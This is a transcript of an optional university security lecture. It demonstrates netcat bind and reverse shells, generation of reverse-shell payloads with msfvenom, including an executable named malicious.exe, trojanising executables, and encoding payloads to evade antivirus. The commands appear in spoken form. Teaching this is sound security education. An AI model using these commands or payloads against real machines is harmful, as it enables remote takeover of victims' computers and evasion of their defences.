Welcome to CS395. This week we are going to be talking about bind shells, reverse shells, and how you can automatically generate shellcode using a tool called MSF Venom. Since this is an optional lecture, you will not have any assignments that are related to the topics that we discuss in this lecture. So first of all, we're going to start with bind shells. Bind shells are essentially programs that allow you to issue commands to a remote server. So there's going to be two machines. There's going to be an attacking machine and a target. The attacking machine is going to connect to a server that's running on the target, and the attacking machine will be able to submit commands to that target. The target will execute those commands and print out their output and send them back to the attacker. This is sort of like the same model as SSH. In SSH, after you log in, you are able to connect to a central SSH server, such as Zeus, for example, and you are able to send whatever commands you would like to Zeus, assuming you have permission to run those commands. Except when we're talking about bind shells, we are specifically talking about an attacker connecting to some target, usually they're using a tool like Netcat. So I am going to bring up Kali Linux real quick. And Kali Linux today is going to be our attacking machine. It has an IP address of 192.168.1.249 on my computer. This is probably going to be different from your computer if you're following along at home. I'm also going to be using my host machine today, and my host machine is running Windows 10. It has an IP address of 192.168.1.247, and it is going to be our target machine for today. So first thing we're going to do is we need to be running a server that on the target, and we are going to be using the netcat command here. In Windows, we use the ncat command, but in Linux, we use nc. So just keep that in mind. Both of these programs are different. What we're going to be doing is we're going to be using ncat-lvp 4444-e cmd.exe. So what this is going to do is this is going to use the ncat program, which, by the way, this is a program that's not pre-installed. You have to download the ncat program and install it onto your computer if you want to follow along with me. Or you could use something like a Linux machine, and most Linux machines have the nc command that's pre-installed, or it's usually pretty easy to, sudo apt install that command. But anyways, we're going to be using ncat. The L right here stands for listening mode. So listening mode essentially means it's going to listen for connections, and it's going to act like a server. It's going to, whenever a connection comes in, it's going to be able to communicate with that client. V stands for verbose mode. So that just means it's going to print out some extra text about what's going on. P is for the port number. And right here, we're going to be using the port number 4444. And then -e is really what's interesting about netcat. What you can do with the -e command is you can specify a file for it to execute. So here we're going to be executing cmd.exe. And what's going to happen is whenever somebody connects to the server and whenever somebody issues a command, it's, sorry, I didn't mean to put that slash there. Let me delete that. It's immediately going to take that command and send it to cmd.exe. And cmd.exe is going to interpret that command and execute it and send back the output, which is then going to be forwarded back to the whoever connected to the server. On our attacking machine, we are also going to be using the netcat command, except again, it's going to be nc, not ncat. We have to do this command syntax for client machines as netcat followed by the IP address, which, as I showed earlier, the IP address of the Windows machine, that's the Windows host machine that's running the server, is 192.168.1.247. And then we need the port number. So I use port 4444. There's nothing really special about this number. You could use 3333 or 1111, doesn't really matter. We hit enter and then just wait for a second. And you'll see over here that we get a working shell, and we can, type in commands here. We can, do whatever we'd like here. This is a working shell prompt, and we can send it commands and communicate with it. And this, as hackers, this is what we want to get, because this allows us to take control over that target machine. So there is a slight issue when you are using bind shells. The main problem with bind shells is the fact that the server is running on the target. And because the server is running on the target, the attacker needs to be connecting to that server. And what's going to happen is if there's a firewall that's standing in between the target and attacker, or if there's like a firewall program that's running on the target, then what's going to happen is usually the firewall will just automatically block any incoming connections that's coming to that server, unless you do something like port forward or do something to get around that. So what we're going to do to avoid that firewall issue is we're actually going to be using something called a reverse shell. A reverse shell is sort of like the opposite of a bind shell. What's going to happen is the attacker is going to be running the server instead of the target. So in our previous example, we had the target run the server, but in this example, we have the attacker running the server. And the target is going to connect back to the attacker, not the other way around, because this way it's an outgoing connection. And most firewalls typically don't block outgoing connections. Some of them do. There are exceptions to this rule, of course. You can make firewall rules that block outgoing connections, but usually most people are more concerned about incoming connections than they are about outgoing connections. So we can use this network right here to still allow the attacker to send commands over to the target and execute, whatever they would like. So the command syntax here is going to be a little bit different, because now we have the attacker, now we have the attacker running the netcat server instead of the target. So if we open up Kali Linux here, and let's just exit out of this real quick. What we're going to be doing here is we are going to be using nc-lvp4444. This is similar to the command that we used on the Windows machine earlier. We open it up in listening mode. So listening mode means we open up a server, and we're going to use port 4444 again. But we're not going to add the -e cmd.exe, because in this scenario, we want it to just open up a server. We only add the -e cmd.exe on the computer that's actually going to be running the commands. So let's hit enter. Over here, we are going to be using ncat as a client now, and we need to type in the Kali Linux's IP address, which is, it just says it right here. It's 192.168.1.249. And we need to type in the port number. And then we are going to use the -e cmd.exe. And one thing that I forgot to mention last time when I was going over this is if you're running this command on a Linux machine, like if your target is a Linux machine, and instead of using cmd.exe, you would actually use /bin/sh instead, because that's what Linux uses to run their commands. So we hit enter, and as you can see right here, we immediately get a shell prompt. And again, the shell works. You can do whatever you'd like with it. Anyways, going back to the slides. Now, the reason that this has a better chance of bypassing the firewall is, like I said earlier, firewalls typically won't block those outgoing connections. And so this is what's usually used in the real world all the time. Penetration testers will use this in their exploits all the time so that they can take control over a remote target and do whatever they would like to with it. In real world exploits, a lot of times our shellcode will be programmed to open up a reverse shell. So instead of just opening up a shell on our own computer like we did in the non-optional lecture this week, we would actually, if we were doing this in the real world, like if we were a real world attacker that wanted to take over a computer, we would actually maybe make this connect back to our own server so that we could issue commands to it. Now we're going to talk about a slightly different topic now. We're going to be talking about how you can automatically generate some shellcode using a very powerful tool called MSF Venom. This tool is used by penetration testers everywhere, and there's a very good reason for it. Why? It's because this is one of the best tools out there for automatically generating shellcode. It is built straight into Kali Linux. So what we're going to be doing here is to list out all of the shellcode that we have access to. We can just do MSF Venom -L payloads, and this will basically print out all of the payloads that MSF Venom can generate for us. It will print out all of the shellcode that it can generate for us. And what we're going to do is we're going to pick one of these payloads. So there is a lot of different payloads that we have access to here. We have, if we just scroll through, we can see there's like a lot of Windows payloads. If we scroll up a little bit, more Windows payloads. There are payloads for different operating systems. So most of them are Windows, but we also have payloads for different programming languages. So like over here, you can see there's some Ruby payloads. There's Python payloads. There's PHP payloads. So like, for example, if you found a way to break into like a web server, if you found like a buffer overflow in a web server, you could use like maybe one of these PHP payloads and then use that to take control over that web server. You also have, Mac, Linux shellcodes are right here. So you have a lot of different options here that you can be choosing from. And today I'm going to be showing you two of them. So the first one I'm going to be showing you is the Linux reverse shell. So what we're going to do is we're going to type in MSF Venom -P Linux /x86/shell reverse TCP. And so what we just did here is we indicated the payload that we want to use. This is a payload that if we scroll all the way up, we'll probably find it somewhere. It's probably somewhere here. I can't find it, but it's probably somewhere here. Anyways, this is the payload that we're going to be doing, and this payload is going to be creating a reverse shell for Linux programs. We're going to be setting the host to be the attacker's IP address, because the attacker is going to be the one who's hosting that, that server that the target is going to connect back to. We also have to indicate the port number. So we used port 4444 last time, so I'm just going to stick with that. There's nothing really special about that number. Again, you could just use like, 11113333 or whatever you want. We're going to print it out in hex format and just give it a moment to run. It takes a moment to think and come up with the shellcode. And this right here is your final shellcode. So it automatically generated shellcode for us, and it was automatically able to create shellcode that we can then use to inject into a vulnerable process or do something else with. Now I'm going to be showing you the Windows version of this. So if we were exploiting a Windows process, we would be using this one instead. Windows shellcode is typically going to be a lot bigger than Linux shellcode, as you can see right here, because the Windows API is it's a little bit more difficult to be using. All right, so the next thing that I wanted to show you all is how you can take some payload and inject it into a file so that whenever somebody executes that file, it's going to form a reverse shell and allow you to connect to that computer and send commands to it. So it's going to be the same syntax as earlier, except this time we're going to be creating a Windows reverse shell into an exe format. And we're going to be printing that out to a file called malicious.exe. So we just go ahead and hit enter and give it a moment. Once we do that, we can take this file and I'm going to copy it onto my Windows desktop real quick. If you're using Mac or Linux or some other operating system, you can just replace this with a reverse shell that works for your operating system, and then replace the format with a format that works for your operating system. Once we do that, we are going to be executing that file. But before we do that, we need to make a server on our attacking machine. And on our target machine, we are just going to be running that malicious.exe file that I just copied over onto my desktop. As you can see, we just got a reverse shell. So MSF Venom is a really cool tool because you can make it do all sorts of cool things. You can make it throw stuff into files and then send those files. You can also inject shellcode into an existing file. So right here, we created a new file, but it is possible to use an existing file and turn it into sort of like a Trojan horse that whenever you execute it, it will make sure that it executes your reverse shell as well. Make sure that if you're doing something like this and you're copying this malicious.exe file into your machine, then make sure that your antivirus is disabled when you do this, because your antivirus will immediately realize that this is an attack occurring and it'll immediately flag that file and get rid of it. So just be aware of that. All right, so one more thing that MSF Venom can do is it can make use of something called an encoder. An encoder, basically, it will look at each line of assembly and it will modify it slightly, but it makes sure that it does the exact same thing that it was programmed to do. So like, if you remember during the lecture this week, we went over how you can create shellcode that does the exact same thing, but it avoids null characters or bad characters or whatever. An encoder does the exact same thing, except instead of you manually going in and changing the assembly, the encoder is going to be doing that for you. Encoded payloads are also very useful for avoiding antiviruses, because sometimes antiviruses are based on hashes or how they behave. So if the payload is encoded, then their behavior will be slightly different. And sometimes that's enough to avoid antiviruses. Sometimes it's not. Depends how good the antivirus is. One thing you should note is that encoders will always increase the size of the payload, because you're adding more code to the assembly payload. And this can usually be a bad thing, because a lot of times we want a smaller size, because let's say if you're given a 350 byte buffer that you need to inject this payload into, if you have a 330 byte payload, then you can inject it into that buffer, no problem. But if you have, a 360 byte payload, well, that's a problem. So the syntax for using the payload is shown right here. You have to use the -e specifier to specify the type of payload that we're going to be using. We're going to be using the Shikata ga nai payload, which is the most common encoder, but there are some others out there as well, but most people go with this one. If you use -b, this specifies what the bad characters are. So we can, right here, we've specified 3 bad characters. We've specified the null byte, 0A and 0D. And then everything aside from that is the exact same as what we did before. So I'm going to go ahead and run this command on Kali right now. All right, this is our final payload. Now, if you take a look at this, we see that the payload size was 351 bytes. If we get rid of the code that does the encoding, then we'll see that the size is actually a lot smaller. So over here, we see it's 324 bytes instead of 351 bytes. So just keep that in mind whenever you're encoding your payloads. The last thing that I wanted to mention real quick is this website called Shellstorm. Shellstorm is an awesome website because it contains a database of a bunch of different shell codes that you could be using for different operating systems or different situations. So if we just scroll down here, we can see there's a bunch of different operating systems that we can select from. And if we just look at the Linux section for a little bit, we can see there's a lot of different options here. There's even a section for Mac and Windows as well, as you can see right here. And if we just click on one of these, like let's say we click on this, this is shellcode that will execute calc.exe on Windows XP. And this is the shellcode right here. So you could just copy and paste that shellcode wherever and use it however you'd like.